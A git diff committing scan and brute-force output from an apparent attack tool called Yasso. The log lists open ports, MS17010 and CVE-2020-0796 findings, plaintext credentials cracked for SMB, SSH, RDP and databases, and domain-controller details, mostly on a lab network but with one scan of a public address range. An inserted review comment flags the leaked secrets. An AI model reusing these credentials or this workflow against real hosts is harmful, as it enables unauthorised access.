diff --git a/Yasso.json b/Yasso.json
index 425cee6..890cc07 100644
--- a/Yasso.json
+++ b/Yasso.json
@@ -1 +1,51 @@
-[{"HostName":"192.168.248.1","Ports":[8089,135,80,5985,139,445,3306],"WeakPass":[{"smb":{"administrator":"930517"}},{"mysql":{"root":"root"}}],"Web":["200 http://192.168.248.1 [Nginx] Index of /","200 http://192.168.248.1:8089 None"]},{"HostName":"192.168.248.212","Ports":[445,80,135,139,3389,5985],"WeakPass":[{"smb":{"administrator":"P@ssw0rd"}}],"Web":["200 http://192.168.248.212 [IIS] IIS Windows Server"]},{"HostName":"192.168.248.219","Ports":[22,27017,21,5432,6379,11211],"WeakPass":[{"ssh":{"root":"kali"}},{"mongodb":{"null":"null"}},{"mongodb":{"admin":"123456"}},{"ftp":{"kali":"kali"}},{"postgres":{"admin":"admin@123"}},{"redis":{"null":"null"}},{"Memcached":{"null":"null"}}],"Web":null}]
\ No newline at end of file
+[
+ {
+ "HostName": "192.168.248.219",
+ "Ports": [
+ 21,
+ 27017,
+ 6379,
+ 22,
+ 11211,
+ 5432
+ ],
+ "WeakPass": [
+ {
+ "ftp": {
+ "kali": "kali"
+ }
+ },
+ {
+ "mongodb": {
+ "null": "null"
+ }
+ },
+ {
+ "mongodb": {
+ "admin": "123456"
+ }
+ },
+ {
+ "redis": {
+ "null": "null"
+ }
+ },
+ {
+ "ssh": {
+ "root": "kali"
+ }
+ },
+ {
+ "Memcached": {
+ "null": "null"
+ }
+ },
+ {
+ "postgres": {
+ "admin": "admin@123"
+ }
+ }
+ ],
+ "Web": null
+ }
+]
\ No newline at end of file
diff --git a/Yasso.log b/Yasso.log
new file mode 100644
index 0000000..0eb1152
--- /dev/null
+++ b/Yasso.log
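Review bot: The new side of Yasso.json, in its `"WeakPass"` entries, stores recovered credentials in plaintext next to the host they belong to, and the Yasso.log added in the same commit carries the same credentials together with hostnames, domain names and public addresses from the scans; neither belongs in version control. Both files look like tool output written into the working directory, so the fix is to add `Yasso.json` and `Yasso.log` to `.gitignore` (or write results to a path outside the checkout), remove them from the repository and its history, and treat every credential and address they contain as exposed. If a sample result file is wanted for documentation, ship one with obviously fictitious hosts and placeholder secrets instead.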
@@ -0,0 +1,1185 @@ + +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] Find 192.168.248.212 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600) +[+] 192.168.248.1 8089 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.212 139 open +[+] 192.168.248.1 3306 open +[+] 192.168.248.212 80 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.212 445 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.212 135 open +[+] 192.168.248.1 80 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 135 open +[+] 192.168.248.212 5985 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 22 open +[+] 192.168.248.212 3389 open +[+] 192.168.248.219 5432 open + +[+] 192.168.248.219 brute ftp success [kali:kali] + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + +[+] 192.168.248.219 brute ssh success [root:kali] +[+] Memcached 192.168.248.219:11211 unauthorized + +[+] 192.168.248.1 brute smb success [administrator:930517] + +[+] 192.168.248.1 brute mysql success [root:root] + +[+] 192.168.248.219 brute postgres success [admin:admin@123] +[NBTBIOS] 192.168.248.212 + DC02 U Workstation Service + KLION G Domain Name + KLION G Domain Controllers + DC02 U Server Service + KLION U Domain Master Browser + ------------------------------------------- + Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3 + NetBIOS domain name : KLION + NetBIOS computer name : DC02 + DNS domain name : klion.local + DNS computer name : Dc02.klion.local + DNS tree name : klion.local +[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02] +[OXID] Hostname Dc02 Network [192.168.248.212] +[OXID] Hostname 
LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1] +[+] 200 http://192.168.248.1 [Nginx] Index of / +[+] 200 http://192.168.248.1:8089 None +[+] 200 http://192.168.248.212 [IIS] IIS Windows Server +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] Find 192.168.248.212 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600) +[+] 192.168.248.1 8089 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.212 445 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.1 80 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 21 open +[+] 192.168.248.212 80 open +[+] 192.168.248.219 22 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.1 139 open +[+] 192.168.248.212 135 open +[+] 192.168.248.212 139 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.212 3389 open +[+] 192.168.248.1 445 open +[+] 192.168.248.212 5985 open +[+] 192.168.248.1 3306 open + +[+] 192.168.248.1 brute smb success [administrator:930517] + +[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.1 brute mysql success [root:root] + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] 192.168.248.219 brute ftp success [kali:kali] + +[+] 192.168.248.219 brute postgres success [admin:admin@123] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] +[+] Memcached 192.168.248.219:11211 unauthorized +[NBTBIOS] 192.168.248.212 + DC02 U Workstation Service + KLION G Domain Name + KLION G Domain Controllers + DC02 U Server Service + KLION U Domain Master Browser + ------------------------------------------- + Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3 + NetBIOS domain name : KLION + NetBIOS computer name : DC02 + DNS domain name : klion.local + 
DNS computer name : Dc02.klion.local + DNS tree name : klion.local +[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02] +[OXID] Hostname Dc02 Network [192.168.248.212] +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1] +[+] 200 http://192.168.248.1 [Nginx] Index of / +[+] 200 http://192.168.248.1:8089 None +[+] 200 http://192.168.248.212 [IIS] IIS Windows Server +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.212 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 3306 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.212 80 open +[+] 192.168.248.212 5985 open +[+] 192.168.248.212 445 open +[+] 192.168.248.1 8089 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 80 open +[+] 192.168.248.219 22 open +[+] 192.168.248.212 139 open +[+] 192.168.248.212 3389 open +[+] 192.168.248.212 135 open + +[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + +[+] 192.168.248.1 brute mysql success [root:root] + +[+] 192.168.248.219 brute ftp success [kali:kali] + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] 192.168.248.219 brute postgres success [admin:admin@123] +[+] Memcached 192.168.248.219:11211 unauthorized + +[+] 192.168.248.1 brute smb success [administrator:930517] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ssh success [kali:kali] +[NBTBIOS] 192.168.248.212 + DC02 U Workstation Service + KLION G Domain Name + KLION G Domain Controllers + DC02 U Server Service + KLION 
U Domain Master Browser + ------------------------------------------- + Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3 + NetBIOS domain name : KLION + NetBIOS computer name : DC02 + DNS domain name : klion.local + DNS computer name : Dc02.klion.local + DNS tree name : klion.local +[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02] +[OXID] Hostname Dc02 Network [192.168.248.212] +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1] +[+] 200 http://192.168.248.212 [IIS] IIS Windows Server +[+] 200 http://192.168.248.1 [Nginx] Index of / +[+] 200 http://192.168.248.1:8089 None +[+] Find 192.168.248.219 (ping) +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.212 (ping) +[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600) +[+] 192.168.248.212 135 open +[+] 192.168.248.212 139 open +[+] 192.168.248.212 3389 open +[+] 192.168.248.212 80 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.212 5985 open +[+] 192.168.248.212 445 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.219 22 open +[+] 192.168.248.219 11211 open + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] 192.168.248.219 brute ftp success [kali:kali] + +[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + +[+] 192.168.248.219 brute postgres success [admin:admin@123] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ssh success [kali:kali] +[+] Memcached 192.168.248.219:11211 unauthorized +[NBTBIOS] 192.168.248.212 + DC02 U Workstation Service + KLION G Domain Name + KLION G Domain Controllers + DC02 U Server Service + KLION U Domain Master Browser + ------------------------------------------- + Windows Server 2012 R2 Standard 
9600|Windows Server 2012 R2 Standard 6.3 + NetBIOS domain name : KLION + NetBIOS computer name : DC02 + DNS domain name : klion.local + DNS computer name : Dc02.klion.local + DNS tree name : klion.local +[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02] +[OXID] Hostname Dc02 Network [192.168.248.212] +[+] 200 http://192.168.248.212 [IIS] IIS Windows Server +[+] Find 59.69.128.56 (ping) +[+] Find 59.69.128.97 (ping) +[+] Find 59.69.128.100 (ping) +[+] Find 59.69.128.98 (ping) +[+] Find 59.69.128.92 (ping) +[+] Find 59.69.128.26 (ping) +[+] Find 59.69.128.8 (ping) +[+] Find 59.69.128.11 (ping) +[+] Find 59.69.128.9 (ping) +[+] Find 59.69.128.113 (ping) +[+] Find 59.69.128.84 (ping) +[+] Find 59.69.128.119 (ping) +[+] Find 59.69.128.117 (ping) +[+] Find 59.69.128.96 (ping) +[+] Find 59.69.128.120 (ping) +[+] Find 59.69.128.1 (ping) +[+] Find 59.69.128.10 (ping) +[+] Find 59.69.128.129 (ping) +[+] Find 59.69.128.67 (ping) +[+] Find 59.69.128.17 (ping) +[+] 59.69.128.1 80 open +[+] 59.69.128.10 22 open +[+] 59.69.128.67 80 open +[+] 59.69.128.17 443 open +[+] 59.69.128.1 443 open +[+] 59.69.128.120 80 open +[+] 59.69.128.120 22 open +[+] 59.69.128.113 443 open +[+] 59.69.128.56 80 open +[+] 59.69.128.113 9000 open +[+] 59.69.128.11 22 open +[+] 403 http://59.69.128.113 403 Forbidden +[+] 403 https://59.69.128.113 403 Forbidden +[+] 302 http://59.69.128.113:9000/account/login/?next=/ 302 Found +[+] 301 https://59.69.128.1/simple/view/login.html +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.212 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600) +[+] 192.168.248.1 80 open +[+] 192.168.248.212 445 open +[+] 192.168.248.212 3389 open +[+] 192.168.248.212 80 open +[+] 192.168.248.1 3306 open +[+] 192.168.248.1 445 open +[+] 192.168.248.212 135 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.212 139 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 11211 
open +[+] 192.168.248.219 22 open +[+] 192.168.248.212 5985 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.219 5432 open + +[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd] + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] 192.168.248.1 brute mysql success [root:root] + +[+] 192.168.248.1 brute smb success [administrator:930517] +[+] Memcached 192.168.248.219:11211 unauthorized + +[+] 192.168.248.219 brute ssh success [kali:kali] + +[+] 192.168.248.219 brute ftp success [kali:kali] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + +[+] 192.168.248.219 brute postgres success [admin:admin@123] +[NBTBIOS] 192.168.248.212 + DC02 U Workstation Service + KLION G Domain Name + KLION G Domain Controllers + DC02 U Server Service + KLION U Domain Master Browser + ------------------------------------------- + Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3 + NetBIOS domain name : KLION + NetBIOS computer name : DC02 + DNS domain name : klion.local + DNS computer name : Dc02.klion.local + DNS tree name : klion.local +[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02] +[OXID] Hostname Dc02 Network [192.168.248.212] +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1] +[+] 200 http://192.168.248.212 [IIS] IIS Windows Server +[+] 200 http://192.168.248.1 [Nginx] Index of / +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.212 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 80 open +[+] 192.168.248.212 5985 open +[+] 192.168.248.219 22 open +[+] 192.168.248.212 135 open +[+] 192.168.248.1 445 open +[+] 192.168.248.212 445 open +[+] 192.168.248.1 3306 open 
+[+] 192.168.248.1 5985 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 21 open +[+] 192.168.248.212 80 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.212 3389 open +[+] 192.168.248.212 139 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 6379 open + +[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ssh success [kali:kali] + +[+] 192.168.248.219 brute ftp success [kali:kali] + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] 192.168.248.1 brute smb success [administrator:930517] + +[+] 192.168.248.1 brute mysql success [root:root] +[+] Memcached 192.168.248.219:11211 unauthorized + +[+] 192.168.248.219 brute postgres success [admin:admin@123] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] +[NBTBIOS] 192.168.248.212 + DC02 U Workstation Service + KLION G Domain Name + KLION G Domain Controllers + DC02 U Server Service + KLION U Domain Master Browser + ------------------------------------------- + Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3 + NetBIOS domain name : KLION + NetBIOS computer name : DC02 + DNS domain name : klion.local + DNS computer name : Dc02.klion.local + DNS tree name : klion.local +[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02] +[OXID] Hostname Dc02 Network [192.168.248.212] +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1] +[+] 200 http://192.168.248.212 [IIS] IIS Windows Server +[+] 200 http://192.168.248.1 [Nginx] Index of / +unknown command "go" for "Yasso" + +Did you mean this? 
+ ps + +[+] Find 192.168.248.212 (ping) +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.212 Find MS17010 (Windows Server 2012 R2 Standard 9600) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 139 open +[+] 192.168.248.1 445 open +[+] 192.168.248.212 5985 open +[+] 192.168.248.219 21 open +[+] 192.168.248.1 80 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 3306 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.212 445 open +[+] 192.168.248.212 80 open +[+] 192.168.248.212 135 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.212 139 open +[+] 192.168.248.219 22 open +[+] 192.168.248.212 3389 open + +[+] 192.168.248.219 brute ftp success [kali:kali] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + +[+] 192.168.248.212 brute smb success [administrator:P@ssw0rd] + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] 192.168.248.1 brute smb success [administrator:930517] +[+] Memcached 192.168.248.219:11211 unauthorized + +[+] 192.168.248.219 brute postgres success [admin:admin@123] + +[+] 192.168.248.1 brute mysql success [root:root] +[NBTBIOS] 192.168.248.212 + DC02 U Workstation Service + KLION G Domain Name + KLION G Domain Controllers + DC02 U Server Service + KLION U Domain Master Browser + ------------------------------------------- + Windows Server 2012 R2 Standard 9600|Windows Server 2012 R2 Standard 6.3 + NetBIOS domain name : KLION + NetBIOS computer name : DC02 + DNS domain name : klion.local + DNS computer name : Dc02.klion.local + DNS tree name : klion.local +[SMB] IP 192.168.248.212 [domain: KLION hostname: DC02] +[OXID] Hostname Dc02 Network [192.168.248.212] +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.0.3 192.168.23.1 192.168.248.1] +[+] 200 http://192.168.248.212 
[IIS] IIS Windows Server +[+] 200 http://192.168.248.1 [Nginx] Index of / +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.219 27017 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 22 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 135 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.1 139 open +[+] 192.168.248.1 8080 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 11211 open + +[+] Mongodb 192.168.248.219 unauthorized + +[+] 192.168.248.219 brute mongodb success [admin:123456] + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + +[+] 192.168.248.1 brute smb success [administrator:930517] + +[+] 192.168.248.219 brute postgres success [admin:admin@123] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ftp success [kali:kali] +[+] Memcached 192.168.248.219:11211 unauthorized +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3] +[+] 404 http://192.168.248.1:8080 None + +[*] Brute Module [ssh] + +[*] Have [user:2] [pass:3] [request:6] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:2] [pass:3] [request:6] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:4] [request:20] + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:4] [request:20] + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:4] [request:5120] + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:3] [request:3840] + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:3] [request:15] + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:3] [request:15] + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:3] [request:15] + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:3] [request:15] + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:3] [request:15] + +[*] Brute Module [ssh] + +[*] Have [user:4] 
[pass:3] [request:12] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:4] [pass:3] [request:12] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:4] [pass:3] [request:12] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:4] [pass:4] [request:16] + +[+] 192.168.248.219 brute ssh success [kali:kali] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:4] [pass:4] [request:16] + +[+] 192.168.248.219 brute ssh success [kali:kali] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[*] brute ssh done + +[*] Brute Module [rdp] + +[*] Have [user:1] [pass:4] [request:4] + +[*] brute rdp done + +[*] Brute Module [rdp] + +[*] Have [user:1] [pass:3] [request:3] + +[*] brute rdp done + +[*] Brute Module [ssh] + +[*] Have [user:1] [pass:3] [request:3] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:2] [pass:3] [request:6] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ssh success [kali:kali] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:2] [pass:4] [request:8] + +[+] 192.168.248.219 brute ssh success [root:kali] + +[+] 192.168.248.219 brute ssh success [kali:kali] + +[*] brute ssh done + +[*] Brute Module [rdp] + +[*] Have [user:2] [pass:2] [request:4] + +[+] 192.168.248.215 brute rdp success [administrator:930517] + +[*] brute rdp done + +[*] Brute Module [rdp] + +[*] Have [user:2] [pass:3] [request:6] + +[+] 192.168.248.215 brute rdp success [administrator:930517] + +[*] brute rdp done + +[*] May be you want to brute? 
try to add --crack + +[*] Brute Module [rdp] + +[*] Have [user:2] [pass:3] [request:6] + +[+] 192.168.248.215 brute rdp success [klion.local\administrator:930517] + +[*] brute rdp done + +[*] Brute Module [rdp] + +[*] Have [user:2] [pass:1] [request:2] + +[+] 192.168.248.215 brute rdp success [klion.local\administrator:930517] + +[*] brute rdp done + +[*] Brute Module [rdp] + +[*] Have [user:2] [pass:3] [request:6] + +[+] 192.168.248.215 brute rdp success [klion.local\administrator:930517] + +[*] brute rdp done + +[*] Brute Module [rdp] + +[*] Have [user:2] [pass:3] [request:6] + +[+] 192.168.248.215 brute rdp success [klion.local\administrator:930517] + +[*] brute rdp done + +[ERROR] Open administrator,Oadmin is failed,please check your user dic path + +[*] Brute Module [ssh] + +[*] Have [user:0] [pass:0] [request:0] + +[*] brute ssh done + +[ERROR] Open administrator,Oadmin is failed,please check your user dic path + +[*] Brute Module [rdp] + +[*] Have [user:0] [pass:0] [request:0] + +[*] brute rdp done + +[*] Brute Module [rdp] + +[*] Have [user:2] [pass:2] [request:4] + +[+] 192.168.248.215 brute rdp success [administrator:930517] + +[*] brute rdp done + +[*] Brute Module [rdp] + +[*] Have [user:3] [pass:1] [request:768] + +[*] brute rdp done +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 139 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 5985 open +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 139 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 135 open +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 135 open +[+] 192.168.248.1 139 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 5985 open +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 445 open +[+] 192.168.248.1 139 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 5985 open +[+] 
Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 139 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 5985 open +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 135 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 139 open +[+] 192.168.248.1 445 open +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 139 open +[+] 192.168.248.1 135 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.1 445 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.219 22 open +[+] 192.168.248.219 6379 open +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 135 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 22 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.219 6379 open +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 139 open +[+] 192.168.248.1 135 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.1 445 open +[+] 192.168.248.219 21 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 22 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.219 5432 open +[+] Find 192.168.248.219 (ping) +[+] Find 192.168.248.1 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 135 open +[+] 192.168.248.1 445 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.219 21 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.219 22 open + +[+] Mongodb 192.168.248.219 unauthorized 
+ +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] +[+] Memcached 192.168.248.219:11211 unauthorized +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3] +[+] 200 http://192.168.248.1:8848 [Node.js] None +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 135 open +[+] 192.168.248.219 11211 open +[+] 192.168.248.219 21 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 445 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.219 22 open +[+] Memcached 192.168.248.219:11211 unauthorized + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] + +[+] Mongodb 192.168.248.219 unauthorized +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3] +[+] 200 http://192.168.248.1:8848 [Node.js] None +[+] Find 192.168.248.1 (ping) +[+] Find 192.168.248.219 (ping) +[+] 192.168.248.1 Find CVE-2020-0796 +[+] 192.168.248.1 135 open +[+] 192.168.248.1 139 open +[+] 192.168.248.219 5432 open +[+] 192.168.248.1 5985 open +[+] 192.168.248.1 445 open +[+] 192.168.248.219 27017 open +[+] 192.168.248.219 21 open +[+] 192.168.248.219 6379 open +[+] 192.168.248.219 22 open +[+] 192.168.248.219 11211 open + +[+] Mongodb 192.168.248.219 unauthorized + +[+] Redis 192.168.248.219:6379 unauthorized +[+] os:[Linux 5.10.0-kali7-amd64 x86_64] path:[] dbfilename:[dump.rdb] pid:[12186] +[+] Memcached 192.168.248.219:11211 unauthorized +[OXID] Hostname LAPTOP-ESQC1EPT Network [192.168.23.1 192.168.248.1 192.168.0.3] +[+] 200 http://192.168.248.1:8848 [Node.js] None + +[*] Brute Module [ssh] + +[*] Have [user:1] [pass:1] [request:1] + +[*] brute ssh done + +[*] Brute Module [ssh] + +[*] Have [user:5] [pass:69] [request:345] + +[+] 
